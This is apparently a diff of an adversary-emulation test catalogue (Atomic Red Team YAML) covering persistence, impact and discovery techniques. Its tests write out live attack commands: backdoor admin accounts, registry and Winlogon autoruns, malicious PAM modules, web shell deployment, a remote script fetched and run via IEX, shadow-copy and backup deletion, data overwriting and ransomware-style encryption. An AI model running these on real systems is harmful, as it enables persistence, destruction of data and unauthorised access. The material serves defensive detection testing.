46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1556.004: technique: @@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 -' + ' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 -' + ' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} -' + ' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 @@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) -' + ' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes -' + ' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: -' + ' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located -' + ' prereq_command: 'which_gpg=`which gpg` -' + ' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} -' + ' cleanup_command: 'rm #{encrypted_file_path} -' + ' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located -' + ' prereq_command: 'which_7z=`which 7z` -' + ' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. -' + ' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file -' + ' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi -' + ' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located -' + ' prereq_command: 'which_openssl=`which openssl` -' + ' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt -' + ' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 -' + ' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. -' + ' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'vssadmin.exe create shadow /for=c: -' + ' executor: command: 'vssadmin.exe delete shadows /all /quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} -' + ' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. -' + ' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 -' + ' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task -' + ' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable -' + ' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. -' + ' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null -' + ' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} -' + ' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} -' + ' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} -' + ' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. -' + ' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} -' + ' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. -' + ' supported_platforms: - macos - linux @@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} -' + ' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. -' + ' supported_platforms: - macos - linux executor: command: 'reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt -p -' + ' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt --reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff -' + ' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff --reboot -' + ' name: bash elevation_required: true T1565.002: @@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) -' + ' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 -' + ' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances 